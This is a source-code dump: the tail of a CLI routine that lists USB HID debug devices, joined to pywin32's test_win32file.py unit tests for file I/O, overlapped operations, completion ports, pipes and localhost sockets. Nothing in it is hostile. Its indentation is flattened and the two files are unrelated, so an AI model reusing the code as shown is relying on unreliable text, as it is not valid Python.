"""Acquire debugging information from usb hid devices
"""
vid = None
pid = None
index = 1
if cli.config.console.device:
device = cli.config.console.device.split(':')
if len(device) == 2:
vid, pid = device
elif len(device) == 3:
vid, pid, index = device
if not index.isdigit():
cli.log.error('Device index must be a number! Got "%s" instead.', index)
exit(1)
index = int(index)
if index < 1:
cli.log.error('Device index must be greater than 0! Got %s', index)
exit(1)
else:
            cli.log.error('Invalid format for device, expected "<vid>:<pid>[:<index>]" but got "%s".', cli.config.console.device)
cli.print_help()
exit(1)
vid = vid.upper()
pid = pid.upper()
device_finder = FindDevices(vid, pid, index, cli.args.numeric)
if cli.args.list:
return list_devices(device_finder)
print('Looking for devices...', flush=True)
device_finder.run_forever()
|
test_win32file.py
|
from __future__ import print_function
import unittest
from pywin32_testutil import str2bytes, TestSkipped, testmain
import win32api, win32file, win32pipe, pywintypes, winerror, win32event
import win32con, ntsecuritycon
import sys
import os
import tempfile
import threading
import time
import shutil
import socket
import datetime
import random
import win32timezone
try:
set
except NameError:
from sets import Set as set
class TestReadBuffer(unittest.TestCase):
def testLen(self):
buffer = win32file.AllocateReadBuffer(1)
self.failUnlessEqual(len(buffer), 1)
def testSimpleIndex(self):
val = str2bytes('\xFF')
buffer = win32file.AllocateReadBuffer(1)
buffer[0] = val
self.failUnlessEqual(buffer[0], val)
def testSimpleSlice(self):
buffer = win32file.AllocateReadBuffer(2)
val = str2bytes('\0\0')
buffer[:2] = val
self.failUnlessEqual(buffer[0:2], val)
class TestSimpleOps(unittest.TestCase):
def testSimpleFiles(self):
fd, filename = tempfile.mkstemp()
os.close(fd)
os.unlink(filename)
handle = win32file.CreateFile(filename, win32file.GENERIC_WRITE, 0, None, win32con.CREATE_NEW, 0, None)
test_data = str2bytes("Hello\0there")
try:
win32file.WriteFile(handle, test_data)
handle.Close()
# Try and open for read
handle = win32file.CreateFile(filename, win32file.GENERIC_READ, 0, None, win32con.OPEN_EXISTING, 0, None)
rc, data = win32file.ReadFile(handle, 1024)
self.assertEquals(data, test_data)
finally:
handle.Close()
try:
os.unlink(filename)
except os.error:
pass
# A simple test using normal read/write operations.
def testMoreFiles(self):
# Create a file in the %TEMP% directory.
testName = os.path.join( win32api.GetTempPath(), "win32filetest.dat" )
desiredAccess = win32file.GENERIC_READ | win32file.GENERIC_WRITE
# Set a flag to delete the file automatically when it is closed.
fileFlags = win32file.FILE_FLAG_DELETE_ON_CLOSE
h = win32file.CreateFile( testName, desiredAccess, win32file.FILE_SHARE_READ, None, win32file.CREATE_ALWAYS, fileFlags, 0)
# Write a known number of bytes to the file.
data = str2bytes("z") * 1025
win32file.WriteFile(h, data)
self.failUnless(win32file.GetFileSize(h) == len(data), "WARNING: Written file does not have the same size as the length of the data in it!")
# Ensure we can read the data back.
win32file.SetFilePointer(h, 0, win32file.FILE_BEGIN)
hr, read_data = win32file.ReadFile(h, len(data)+10) # + 10 to get anything extra
self.failUnless(hr==0, "Readfile returned %d" % hr)
self.failUnless(read_data == data, "Read data is not what we wrote!")
# Now truncate the file at 1/2 its existing size.
newSize = len(data)//2
win32file.SetFilePointer(h, newSize, win32file.FILE_BEGIN)
win32file.SetEndOfFile(h)
self.failUnlessEqual(win32file.GetFileSize(h), newSize)
# GetFileAttributesEx/GetFileAttributesExW tests.
self.failUnlessEqual(win32file.GetFileAttributesEx(testName), win32file.GetFileAttributesExW(testName))
attr, ct, at, wt, size = win32file.GetFileAttributesEx(testName)
self.failUnless(size==newSize,
"Expected GetFileAttributesEx to return the same size as GetFileSize()")
self.failUnless(attr==win32file.GetFileAttributes(testName),
"Expected GetFileAttributesEx to return the same attributes as GetFileAttributes")
h = None # Close the file by removing the last reference to the handle!
self.failUnless(not os.path.isfile(testName), "After closing the file, it still exists!")
def testFilePointer(self):
# via [ 979270 ] SetFilePointer fails with negative offset
# Create a file in the %TEMP% directory.
filename = os.path.join( win32api.GetTempPath(), "win32filetest.dat" )
f = win32file.CreateFile(filename,
win32file.GENERIC_READ|win32file.GENERIC_WRITE,
0,
None,
win32file.CREATE_ALWAYS,
win32file.FILE_ATTRIBUTE_NORMAL,
0)
try:
#Write some data
data = str2bytes('Some data')
(res, written) = win32file.WriteFile(f, data)
self.failIf(res)
self.assertEqual(written, len(data))
#Move at the beginning and read the data
win32file.SetFilePointer(f, 0, win32file.FILE_BEGIN)
(res, s) = win32file.ReadFile(f, len(data))
self.failIf(res)
self.assertEqual(s, data)
#Move at the end and read the data
win32file.SetFilePointer(f, -len(data), win32file.FILE_END)
(res, s) = win32file.ReadFile(f, len(data))
self.failIf(res)
self.failUnlessEqual(s, data)
finally:
f.Close()
os.unlink(filename)
def testFileTimesTimezones(self):
if not issubclass(pywintypes.TimeType, datetime.datetime):
# maybe should report 'skipped', but that's not quite right as
# there is nothing you can do to avoid it being skipped!
return
filename = tempfile.mktemp("-testFileTimes")
# now() is always returning a timestamp with microseconds but the
# file APIs all have zero microseconds, so some comparisons fail.
now_utc = win32timezone.utcnow().replace(microsecond=0)
now_local = now_utc.astimezone(win32timezone.TimeZoneInfo.local())
h = win32file.CreateFile(filename,
win32file.GENERIC_READ|win32file.GENERIC_WRITE,
0, None, win32file.CREATE_ALWAYS, 0, 0)
try:
win32file.SetFileTime(h, now_utc, now_utc, now_utc)
ct, at, wt = win32file.GetFileTime(h)
self.failUnlessEqual(now_local, ct)
self.failUnlessEqual(now_local, at)
self.failUnlessEqual(now_local, wt)
# and the reverse - set local, check against utc
win32file.SetFileTime(h, now_local, now_local, now_local)
ct, at, wt = win32file.GetFileTime(h)
self.failUnlessEqual(now_utc, ct)
self.failUnlessEqual(now_utc, at)
self.failUnlessEqual(now_utc, wt)
finally:
h.close()
os.unlink(filename)
def testFileTimes(self):
if issubclass(pywintypes.TimeType, datetime.datetime):
from win32timezone import TimeZoneInfo
# now() is always returning a timestamp with microseconds but the
# file APIs all have zero microseconds, so some comparisons fail.
now = datetime.datetime.now(tz=TimeZoneInfo.utc()).replace(microsecond=0)
nowish = now + datetime.timedelta(seconds=1)
later = now + datetime.timedelta(seconds=120)
else:
rc, tzi = win32api.GetTimeZoneInformation()
bias = tzi[0]
if rc==2: # daylight-savings is in effect.
bias += tzi[-1]
bias *= 60 # minutes to seconds...
tick = int(time.time())
now = pywintypes.Time(tick+bias)
nowish = pywintypes.Time(tick+bias+1)
later = pywintypes.Time(tick+bias+120)
filename = tempfile.mktemp("-testFileTimes")
# Windows docs the 'last time' isn't valid until the last write
# handle is closed - so create the file, then re-open it to check.
open(filename,"w").close()
f = win32file.CreateFile(filename, win32file.GENERIC_READ|win32file.GENERIC_WRITE,
0, None,
win32con.OPEN_EXISTING, 0, None)
try:
ct, at, wt = win32file.GetFileTime(f)
self.failUnless(ct >= now, "File was created in the past - now=%s, created=%s" % (now, ct))
self.failUnless( now <= ct <= nowish, (now, ct))
self.failUnless(wt >= now, "File was written-to in the past now=%s, written=%s" % (now,wt))
self.failUnless( now <= wt <= nowish, (now, wt))
# Now set the times.
win32file.SetFileTime(f, later, later, later, UTCTimes=True)
# Get them back.
ct, at, wt = win32file.GetFileTime(f)
# XXX - the builtin PyTime type appears to be out by a dst offset.
# just ignore that type here...
self.failUnlessEqual(ct, later)
self.failUnlessEqual(at, later)
self.failUnlessEqual(wt, later)
finally:
f.Close()
os.unlink(filename)
class TestGetFileInfoByHandleEx(unittest.TestCase):
__handle = __filename = None
def setUp(self):
fd, self.__filename = tempfile.mkstemp()
os.close(fd)
def tearDown(self):
if self.__handle is not None:
self.__handle.Close()
if self.__filename is not None:
try:
os.unlink(self.__filename)
except OSError:
pass
self.__handle = self.__filename = None
def testFileBasicInfo(self):
attr = win32file.GetFileAttributes(self.__filename)
f = win32file.CreateFile(self.__filename, win32file.GENERIC_READ, 0, None,
win32con.OPEN_EXISTING, 0, None)
self.__handle = f
ct, at, wt = win32file.GetFileTime(f)
# bug #752: this throws ERROR_BAD_LENGTH (24) in x86 binaries of build 221
basic_info = win32file.GetFileInformationByHandleEx(f, win32file.FileBasicInfo)
self.assertEqual(ct, basic_info['CreationTime'])
self.assertEqual(at, basic_info['LastAccessTime'])
self.assertEqual(wt, basic_info['LastWriteTime'])
self.assertEqual(attr, basic_info['FileAttributes'])
class TestOverlapped(unittest.TestCase):
def testSimpleOverlapped(self):
# Create a file in the %TEMP% directory.
import win32event
testName = os.path.join( win32api.GetTempPath(), "win32filetest.dat" )
desiredAccess = win32file.GENERIC_WRITE
overlapped = pywintypes.OVERLAPPED()
evt = win32event.CreateEvent(None, 0, 0, None)
overlapped.hEvent = evt
# Create the file and write shit-loads of data to it.
h = win32file.CreateFile( testName, desiredAccess, 0, None, win32file.CREATE_ALWAYS, 0, 0)
chunk_data = str2bytes("z") * 0x8000
num_loops = 512
expected_size = num_loops * len(chunk_data)
for i in range(num_loops):
win32file.WriteFile(h, chunk_data, overlapped)
win32event.WaitForSingleObject(overlapped.hEvent, win32event.INFINITE)
overlapped.Offset = overlapped.Offset + len(chunk_data)
h.Close()
# Now read the data back overlapped
overlapped = pywintypes.OVERLAPPED()
evt = win32event.CreateEvent(None, 0, 0, None)
overlapped.hEvent = evt
desiredAccess = win32file.GENERIC_READ
h = win32file.CreateFile( testName, desiredAccess, 0, None, win32file.OPEN_EXISTING, 0, 0)
buffer = win32file.AllocateReadBuffer(0xFFFF)
while 1:
try:
hr, data = win32file.ReadFile(h, buffer, overlapped)
win32event.WaitForSingleObject(overlapped.hEvent, win32event.INFINITE)
overlapped.Offset = overlapped.Offset + len(data)
if not data is buffer:
self.fail("Unexpected result from ReadFile - should be the same buffer we passed it")
except win32api.error:
break
h.Close()
def testCompletionPortsMultiple(self):
# Mainly checking that we can "associate" an existing handle. This
# failed in build 203.
ioport = win32file.CreateIoCompletionPort(win32file.INVALID_HANDLE_VALUE,
0, 0, 0)
socks = []
for PORT in range(9123, 9125):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', PORT))
sock.listen(1)
socks.append(sock)
new = win32file.CreateIoCompletionPort(sock.fileno(), ioport, PORT, 0)
assert new is ioport
for s in socks:
s.close()
hv = int(ioport)
ioport = new = None
# The handle itself should be closed now (unless we leak references!)
# Check that.
try:
win32file.CloseHandle(hv)
raise RuntimeError("Expected close to fail!")
except win32file.error as details:
self.failUnlessEqual(details.winerror, winerror.ERROR_INVALID_HANDLE)
def testCompletionPortsQueued(self):
class Foo: pass
io_req_port = win32file.CreateIoCompletionPort(-1, None, 0, 0)
overlapped = pywintypes.OVERLAPPED()
overlapped.object = Foo()
win32file.PostQueuedCompletionStatus(io_req_port, 0, 99, overlapped)
errCode, bytes, key, overlapped = \
win32file.GetQueuedCompletionStatus(io_req_port, win32event.INFINITE)
self.failUnlessEqual(errCode, 0)
self.failUnless(isinstance(overlapped.object, Foo))
def _IOCPServerThread(self, handle, port, drop_overlapped_reference):
overlapped = pywintypes.OVERLAPPED()
win32pipe.ConnectNamedPipe(handle, overlapped)
if drop_overlapped_reference:
# Be naughty - the overlapped object is now dead, but
# GetQueuedCompletionStatus will still find it. Our check of
# reference counting should catch that error.
overlapped = None
# even if we fail, be sure to close the handle; prevents hangs
# on Vista 64...
try:
self.failUnlessRaises(RuntimeError,
win32file.GetQueuedCompletionStatus, port, -1)
finally:
handle.Close()
return
result = win32file.GetQueuedCompletionStatus(port, -1)
ol2 = result[-1]
self.failUnless(ol2 is overlapped)
data = win32file.ReadFile(handle, 512)[1]
win32file.WriteFile(handle, data)
def testCompletionPortsNonQueued(self, test_overlapped_death = 0):
# In 204 we had a reference count bug when OVERLAPPED objects were
# associated with a completion port other than via
# PostQueuedCompletionStatus. This test is based on the reproduction
# reported with that bug.
# Create the pipe.
BUFSIZE = 512
pipe_name = r"\\.\pipe\pywin32_test_pipe"
handle = win32pipe.CreateNamedPipe(pipe_name,
win32pipe.PIPE_ACCESS_DUPLEX|
win32file.FILE_FLAG_OVERLAPPED,
win32pipe.PIPE_TYPE_MESSAGE|
win32pipe.PIPE_READMODE_MESSAGE|
win32pipe.PIPE_WAIT,
1, BUFSIZE, BUFSIZE,
win32pipe.NMPWAIT_WAIT_FOREVER,
None)
# Create an IOCP and associate it with the handle.
port = win32file.CreateIoCompletionPort(-1, 0, 0, 0)
win32file.CreateIoCompletionPort(handle, port, 1, 0)
t = threading.Thread(target=self._IOCPServerThread, args=(handle,port, test_overlapped_death))
t.setDaemon(True) # avoid hanging entire test suite on failure.
t.start()
try:
time.sleep(0.1) # let thread do its thing.
try:
win32pipe.CallNamedPipe(r"\\.\pipe\pywin32_test_pipe", str2bytes("Hello there"), BUFSIZE, 0)
except win32pipe.error:
# Testing for overlapped death causes this
if not test_overlapped_death:
raise
finally:
if not test_overlapped_death:
handle.Close()
t.join(3)
self.failIf(t.isAlive(), "thread didn't finish")
def testCompletionPortsNonQueuedBadReference(self):
self.testCompletionPortsNonQueued(True)
def testHashable(self):
overlapped = pywintypes.OVERLAPPED()
d = {}
d[overlapped] = "hello"
self.failUnlessEqual(d[overlapped], "hello")
def testComparable(self):
overlapped = pywintypes.OVERLAPPED()
self.failUnlessEqual(overlapped, overlapped)
# ensure we explicitly test the operators.
self.failUnless(overlapped == overlapped)
self.failIf(overlapped != overlapped)
def testComparable2(self):
# 2 overlapped objects compare equal if their contents are the same.
overlapped1 = pywintypes.OVERLAPPED()
overlapped2 = pywintypes.OVERLAPPED()
self.failUnlessEqual(overlapped1, overlapped2)
# ensure we explicitly test the operators.
self.failUnless(overlapped1 == overlapped2)
self.failIf(overlapped1 != overlapped2)
# now change something in one of them - should no longer be equal.
overlapped1.hEvent = 1
self.failIfEqual(overlapped1, overlapped2)
# ensure we explicitly test the operators.
self.failIf(overlapped1 == overlapped2)
self.failUnless(overlapped1 != overlapped2)
class TestSocketExtensions(unittest.TestCase):
def acceptWorker(self, port, running_event, stopped_event):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(('', port))
listener.listen(200)
# create accept socket
accepter = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# An overlapped
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# accept the connection.
# We used to allow strings etc to be passed here, and they would be
# modified! Obviously this is evil :)
buffer = " " * 1024 # EVIL - SHOULD NOT BE ALLOWED.
self.assertRaises(TypeError, win32file.AcceptEx, listener, accepter, buffer, overlapped)
# This is the correct way to allocate the buffer...
buffer = win32file.AllocateReadBuffer(1024)
rc = win32file.AcceptEx(listener, accepter, buffer, overlapped)
self.failUnlessEqual(rc, winerror.ERROR_IO_PENDING)
# Set the event to say we are all ready
running_event.set()
# and wait for the connection.
rc = win32event.WaitForSingleObject(overlapped.hEvent, 2000)
if rc == win32event.WAIT_TIMEOUT:
self.fail("timed out waiting for a connection")
nbytes = win32file.GetOverlappedResult(listener.fileno(), overlapped, False)
#fam, loc, rem = win32file.GetAcceptExSockaddrs(accepter, buffer)
accepter.send(buffer[:nbytes])
# NOT set in a finally - this means *successfully* stopped!
stopped_event.set()
def testAcceptEx(self):
port = 4680
running = threading.Event()
stopped = threading.Event()
t = threading.Thread(target=self.acceptWorker, args=(port, running,stopped))
t.start()
running.wait(2)
if not running.isSet():
self.fail("AcceptEx Worker thread failed to start")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', port))
win32file.WSASend(s, str2bytes("hello"), None)
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# Like above - WSARecv used to allow strings as the receive buffer!!
buffer = " " * 10
self.assertRaises(TypeError, win32file.WSARecv, s, buffer, overlapped)
# This one should work :)
buffer = win32file.AllocateReadBuffer(10)
win32file.WSARecv(s, buffer, overlapped)
nbytes = win32file.GetOverlappedResult(s.fileno(), overlapped, True)
got = buffer[:nbytes]
self.failUnlessEqual(got, str2bytes("hello"))
# thread should have stopped
stopped.wait(2)
if not stopped.isSet():
self.fail("AcceptEx Worker thread failed to successfully stop")
class TestFindFiles(unittest.TestCase):
def testIter(self):
dir = os.path.join(os.getcwd(), "*")
files = win32file.FindFilesW(dir)
set1 = set()
set1.update(files)
set2 = set()
for file in win32file.FindFilesIterator(dir):
set2.add(file)
assert len(set2) > 5, "This directory has less than 5 files!?"
self.failUnlessEqual(set1, set2)
def testBadDir(self):
dir = os.path.join(os.getcwd(), "a dir that doesnt exist", "*")
self.assertRaises(win32file.error, win32file.FindFilesIterator, dir)
def testEmptySpec(self):
spec = os.path.join(os.getcwd(), "*.foo_bar")
num = 0
for i in win32file.FindFilesIterator(spec):
num += 1
self.failUnlessEqual(0, num)
def testEmptyDir(self):
test_path = os.path.join(win32api.GetTempPath(), "win32file_test_directory")
try:
# Note: previously used shutil.rmtree, but when looking for
# reference count leaks, that function showed leaks! os.rmdir
# doesn't have that problem.
os.rmdir(test_path)
except os.error:
pass
os.mkdir(test_path)
try:
num = 0
for i in win32file.FindFilesIterator(os.path.join(test_path, "*")):
num += 1
# Expecting "." and ".." only
self.failUnlessEqual(2, num)
finally:
os.rmdir(test_path)
class TestDirectoryChanges(unittest.TestCase):
num_test_dirs = 1
def setUp(self):
self.watcher_threads = []
self.watcher_thread_changes = []
self.dir_names = []
self.dir_handles = []
for i in range(self.num_test_dirs):
td = tempfile.mktemp("-test-directory-changes-%d" % i)
os.mkdir(td)
self.dir_names.append(td)
hdir = win32file.CreateFile(td,
ntsecuritycon.FILE_LIST_DIRECTORY,
win32con.FILE_SHARE_READ,
None, # security desc
win32con.OPEN_EXISTING,
win32con.FILE_FLAG_BACKUP_SEMANTICS |
win32con.FILE_FLAG_OVERLAPPED,
None)
self.dir_handles.append(hdir)
changes = []
t = threading.Thread(target=self._watcherThreadOverlapped,
args=(td, hdir, changes))
t.start()
self.watcher_threads.append(t)
self.watcher_thread_changes.append(changes)
def _watcherThread(self, dn, dh, changes):
# A synchronous version:
# XXX - not used - I was having a whole lot of problems trying to
# get this to work. Specifically:
# * ReadDirectoryChangesW without an OVERLAPPED blocks infinitely.
# * If another thread attempts to close the handle while
# ReadDirectoryChangesW is waiting on it, the ::CloseHandle() method
# blocks (which has nothing to do with the GIL - it is correctly
# managed)
# Which ends up with no way to kill the thread!
flags = win32con.FILE_NOTIFY_CHANGE_FILE_NAME
while 1:
try:
print("waiting", dh)
                new_changes = win32file.ReadDirectoryChangesW(dh,
                                                              8192,
                                                              False, #sub-tree
                                                              flags)
                print("got", new_changes)
            except:
                raise
            changes.extend(new_changes)
def _watcherThreadOverlapped(self, dn, dh, changes):
flags = win32con.FILE_NOTIFY_CHANGE_FILE_NAME
buf = win32file.AllocateReadBuffer(8192)
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
while 1:
win32file.ReadDirectoryChangesW(dh,
buf,
False, #sub-tree
flags,
overlapped)
# Wait for our event, or for 5 seconds.
rc = win32event.WaitForSingleObject(overlapped.hEvent, 5000)
if rc == win32event.WAIT_OBJECT_0:
# got some data! Must use GetOverlappedResult to find out
# how much is valid! 0 generally means the handle has
# been closed. Blocking is OK here, as the event has
# already been set.
nbytes = win32file.GetOverlappedResult(dh, overlapped, True)
if nbytes:
bits = win32file.FILE_NOTIFY_INFORMATION(buf, nbytes)
changes.extend(bits)
else:
# This is "normal" exit - our 'tearDown' closes the
# handle.
# print "looks like dir handle was closed!"
return
else:
print("ERROR: Watcher thread timed-out!")
return # kill the thread!
def tearDown(self):
# be careful about raising errors at teardown!
for h in self.dir_handles:
# See comments in _watcherThread above - this appears to
# deadlock if a synchronous ReadDirectoryChangesW is waiting...
# (No such problems with an asynch ReadDirectoryChangesW)
h.Close()
for dn in self.dir_names:
try:
shutil.rmtree(dn)
except OSError:
print("FAILED to remove directory", dn)
for t in self.watcher_threads:
# closing dir handle should have killed threads!
t.join(5)
if t.isAlive():
print("FAILED to wait for thread termination")
def stablize(self):
time.sleep(0.5)
def testSimple(self):
self.stablize()
for dn in self.dir_names:
fn = os.path.join(dn, "test_file")
open(fn, "w").close()
self.stablize()
changes = self.watcher_thread_changes[0]
self.failUnlessEqual(changes, [(1, "test_file")])
def testSmall(self):
self.stablize()
for dn in self.dir_names:
fn = os.path.join(dn, "x")
open(fn, "w").close()
self.stablize()
changes = self.watcher_thread_changes[0]
self.failUnlessEqual(changes, [(1, "x")])
class TestEncrypt(unittest.TestCase):
def testEncrypt(self):
fname = tempfile.mktemp("win32file_test")
f = open(fname, "wb")
f.write(str2bytes("hello"))
f.close()
f = None
try:
try:
win32file.EncryptFile(fname)
except win32file.error as details:
if details.winerror != winerror.ERROR_ACCESS_DENIED:
raise
                print("It appears this is not NTFS - can't encrypt/decrypt")
win32file.DecryptFile(fname)
finally:
if f is not None:
f.close()
os.unlink(fname)
class TestConnect(unittest.TestCase):
def connect_thread_runner(self, expect_payload, giveup_event):
# As Windows 2000 doesn't do ConnectEx, we need to use a non-blocking
# accept, as our test connection may never come. May as well use
# AcceptEx for this...
listener = socket.socket()
self.addr = ('localhost', random.randint(10000,64000))
listener.bind(self.addr)
listener.listen(1)
# create accept socket
accepter = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# An overlapped
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# accept the connection.
if expect_payload:
buf_size = 1024
else:
# when we don't expect data we must be careful to only pass the
# exact number of bytes for the endpoint data...
buf_size = win32file.CalculateSocketEndPointSize(listener)
buffer = win32file.AllocateReadBuffer(buf_size)
win32file.AcceptEx(listener, accepter, buffer, overlapped)
# wait for the connection or our test to fail.
events = giveup_event, overlapped.hEvent
rc = win32event.WaitForMultipleObjects(events, False, 2000)
if rc == win32event.WAIT_TIMEOUT:
self.fail("timed out waiting for a connection")
if rc == win32event.WAIT_OBJECT_0:
# Our main thread running the test failed and will never connect.
return
# must be a connection.
nbytes = win32file.GetOverlappedResult(listener.fileno(), overlapped, False)
if expect_payload:
self.request = buffer[:nbytes]
accepter.send(str2bytes('some expected response'))
def test_connect_with_payload(self):
giveup_event = win32event.CreateEvent(None, 0, 0, None)
t = threading.Thread(target=self.connect_thread_runner,
args=(True, giveup_event))
t.start()
time.sleep(0.1)
s2 = socket.socket()
ol = pywintypes.OVERLAPPED()
s2.bind(('0.0.0.0', 0)) # connectex requires the socket be bound beforehand
try:
win32file.ConnectEx(s2, self.addr, ol, str2bytes("some expected request"))
except win32file.error as exc:
win32event.SetEvent(giveup_event)
if exc.winerror == 10022: # WSAEINVAL
raise TestSkipped("ConnectEx is not available on this platform")
raise # some error we don't expect.
win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
buff = win32file.AllocateReadBuffer(1024)
win32file.WSARecv(s2, buff, ol, 0)
length = win32file.GetOverlappedResult(s2.fileno(), ol, 1)
self.response = buff[:length]
self.assertEqual(self.response, str2bytes('some expected response'))
self.assertEqual(self.request, str2bytes('some expected request'))
t.join(5)
self.failIf(t.is_alive(), "worker thread didn't terminate")
def test_connect_without_payload(self):
giveup_event = win32event.CreateEvent(None, 0, 0, None)
t = threading.Thread(target=self.connect_thread_runner,
args=(False, giveup_event))
t.start()
time.sleep(0.1)
s2 = socket.socket()
ol = pywintypes.OVERLAPPED()
s2.bind(('0.0.0.0', 0)) # connectex requires the socket be bound beforehand
try:
win32file.ConnectEx(s2, self.addr, ol)
except win32file.error as exc:
win32event.SetEvent(giveup_event)
if exc.winerror == 10022: # WSAEINVAL
raise TestSkipped("ConnectEx is not available on this platform")
raise # some error we don't expect.
win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
buff = win32file.AllocateReadBuffer(1024)
win32file.WSARecv(s2, buff, ol, 0)
length = win32file.GetOverlappedResult(s2.fileno(), ol, 1)
self.response = buff[:length]
self.assertEqual(self.response, str2bytes('some expected response'))
t.join(5)
self.failIf(t.is_alive(), "worker thread didn't terminate")
class TestTransmit(unittest.TestCase):
def test_transmit(self):
import binascii
bytes = os.urandom(1024*1024)
val = binascii.hexlify(bytes)
val_length = len(val)
f = tempfile.TemporaryFile()
f.write(val)
def runner():
s1 = socket.socket()
self.addr = ('localhost', random.randint(10000,64000))
s1.bind(self.addr)
s1.listen(1)
cli, addr = s1.accept()
buf = 1
self.request = []
while buf:
buf = cli.recv(1024*100)
self.request.append(buf)
th = threading.Thread(target=runner)
th.start()
time.sleep(0.5)
s2 = socket.socket()
s2.connect(self.addr)
length = 0
aaa = str2bytes("[AAA]")
bbb = str2bytes("[BBB]")
ccc = str2bytes("[CCC]")
ddd = str2bytes("[DDD]")
empty = str2bytes("")
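# Each TransmitFile call below sends the file contents, optionally wrapped in
# "head" and "tail" buffers passed after the flags argument, so the receiving
# thread should see, in order: val, aaa+val+bbb, val, val+ccc, ddd+val.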
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, aaa, bbb)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, empty, empty)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, None, ccc)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, ddd)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
s2.close()
th.join()
buf = str2bytes('').join(self.request)
self.assertEqual(length, len(buf))
expected = val + aaa + val + bbb + val + val + ccc + ddd + val
self.assertEqual(type(expected), type(buf))
self.assert_(expected == buf)
class TestWSAEnumNetworkEvents(unittest.TestCase):
def test_basics(self):
s = socket.socket()
e = win32event.CreateEvent(None, 1, 0, None)
win32file.WSAEventSelect(s, e, 0)
self.assertEquals(win32file.WSAEnumNetworkEvents(s), {})
self.assertEquals(win32file.WSAEnumNetworkEvents(s, e), {})
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, s, e, 3)
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, s, "spam")
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, "spam", e)
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, "spam")
f = open("NUL")
h = win32file._get_osfhandle(f.fileno())
self.assertRaises(win32file.error, win32file.WSAEnumNetworkEvents, h)
self.assertRaises(win32file.error, win32file.WSAEnumNetworkEvents, s, h)
try:
win32file.WSAEnumNetworkEvents(h)
except win32file.error as e:
self.assertEquals(e.winerror, win32file.WSAENOTSOCK)
try:
win32file.WSAEnumNetworkEvents(s, h)
except win32file.error as e:
# According to the docs it would seem reasonable that
# this would fail with WSAEINVAL, but it doesn't.
self.assertEquals(e.winerror, win32file.WSAENOTSOCK)
def test_functional(self):
# This is not really a unit test, but it does exercise the code
# quite well and can serve as an example of WSAEventSelect and
# WSAEnumNetworkEvents usage.
port = socket.socket()
port.setblocking(0)
port_event = win32event.CreateEvent(None, 0, 0, None)
win32file.WSAEventSelect(port, port_event,
win32file.FD_ACCEPT |
win32file.FD_CLOSE)
port.bind(("127.0.0.1", 0))
port.listen(10)
client = socket.socket()
client.setblocking(0)
client_event = win32event.CreateEvent(None, 0, 0, None)
win32file.WSAEventSelect(client, client_event,
win32file.FD_CONNECT |
win32file.FD_READ |
win32file.FD_WRITE |
win32file.FD_CLOSE)
err = client.connect_ex(port.getsockname())
self.assertEquals(err, win32file.WSAEWOULDBLOCK)
res = win32event.WaitForSingleObject(port_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(port, port_event)
self.assertEquals(events, {win32file.FD_ACCEPT: 0})
server, addr = port.accept()
server.setblocking(0)
server_event = win32event.CreateEvent(None, 1, 0, None)
win32file.WSAEventSelect(server, server_event,
win32file.FD_READ |
win32file.FD_WRITE |
win32file.FD_CLOSE)
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(server, server_event)
self.assertEquals(events, {win32file.FD_WRITE: 0})
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_CONNECT: 0,
win32file.FD_WRITE: 0})
sent = 0
data = str2bytes("x") * 16 * 1024
while sent < 16 * 1024 * 1024:
try:
sent += client.send(data)
except socket.error as e:
if e.args[0] == win32file.WSAEINTR:
continue
elif e.args[0] in (win32file.WSAEWOULDBLOCK, win32file.WSAENOBUFS):
break
else:
raise
else:
self.fail("could not find socket buffer limit")
events = win32file.WSAEnumNetworkEvents(client)
self.assertEquals(events, {})
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(server, server_event)
self.assertEquals(events, {win32file.FD_READ: 0})
received = 0
while received < sent:
try:
received += len(server.recv(16 * 1024))
except socket.error as e:
if e.args[0] in [win32file.WSAEINTR, win32file.WSAEWOULDBLOCK]:
continue
else:
raise
self.assertEquals(received, sent)
events = win32file.WSAEnumNetworkEvents(server)
self.assertEquals(events, {})
